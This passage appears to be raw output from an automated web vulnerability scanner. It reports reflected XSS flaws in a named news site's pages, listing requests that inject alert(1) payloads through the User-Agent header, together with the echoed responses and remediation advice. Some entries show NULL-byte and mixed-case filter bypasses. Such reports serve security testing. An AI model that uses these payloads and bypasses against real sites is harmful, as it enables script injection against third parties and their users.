Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/galleries/smb/ebusiness/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)12a6c"-alert(1)-"1f25c426468 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:36 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:36 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30504
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)12a6c"-alert(1)-"1f25c426468"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 944e6"-alert(1)-"71356dc46bb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/global-cio/interviews/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)944e6"-alert(1)-"71356dc46bb Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:35 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:35 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30799
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)944e6"-alert(1)-"71356dc46bb"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89605"-alert(1)-"deebaea4c96 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/government/policy/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)89605"-alert(1)-"deebaea4c96 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:45 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:45 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30649
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)89605"-alert(1)-"deebaea4c96"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffef4"-alert(1)-"265893c47d4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/storage/data_protection/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ffef4"-alert(1)-"265893c47d4 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:34 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:34 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 29995
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ffef4"-alert(1)-"265893c47d4"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4212f"-alert(1)-"f2aea13f6fd was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/storage/systems/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4212f"-alert(1)-"f2aea13f6fd Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:36 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:36 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 29883
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4212f"-alert(1)-"f2aea13f6fd"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %001bbc7"-alert(1)-"9835e874fef was submitted in the User-Agent HTTP header. This input was echoed as 1bbc7"-alert(1)-"9835e874fef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /newsletters/subscribe.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%001bbc7"-alert(1)-"9835e874fef Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:23:00 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:00 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 84564
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><ti ...[SNIP]... s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%001bbc7"-alert(1)-"9835e874fef"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 485a4"-alert(1)-"0580e8b2170 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /take.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: 485a4"-alert(1)-"0580e8b2170 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:54 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:54 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 52249
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 632db"-alert(1)-"be9159c7c5c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security/21090964001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: 632db"-alert(1)-"be9159c7c5c Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:40 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:40 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 68332
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00abe0d"-alert(1)-"21ff2ee9e6 was submitted in the User-Agent HTTP header. This input was echoed as abe0d"-alert(1)-"21ff2ee9e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /video/security/37740285001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00abe0d"-alert(1)-"21ff2ee9e6 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:59 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:59 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 68003
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00abe0d"-alert(1)-"21ff2ee9e6"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 343b0"-alert(1)-"30dbea6ae52 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security/42988833001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)343b0"-alert(1)-"30dbea6ae52 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:35 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:35 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 68465
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)343b0"-alert(1)-"30dbea6ae52"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %009ddce</script><script>alert(1)</script>f40c3391b78 was submitted in the User-Agent HTTP header. This input was echoed as 9ddce</script><script>alert(1)</script>f40c3391b78 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /video/security/68553969001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: %009ddce</script><script>alert(1)</script>f40c3391b78 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:19 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:19 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 68175
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4941"-alert(1)-"cbb82246eab was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: f4941"-alert(1)-"cbb82246eab Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:24 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:24 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 70393
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0045705</script><ScRiPt>alert(1)</ScRiPt>d1fd8d17d23 was submitted in the User-Agent HTTP header. This input was echoed as 45705</script><ScRiPt>alert(1)</ScRiPt>d1fd8d17d23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /whitepaper/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%0045705</script><ScRiPt>alert(1)</ScRiPt>d1fd8d17d23 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
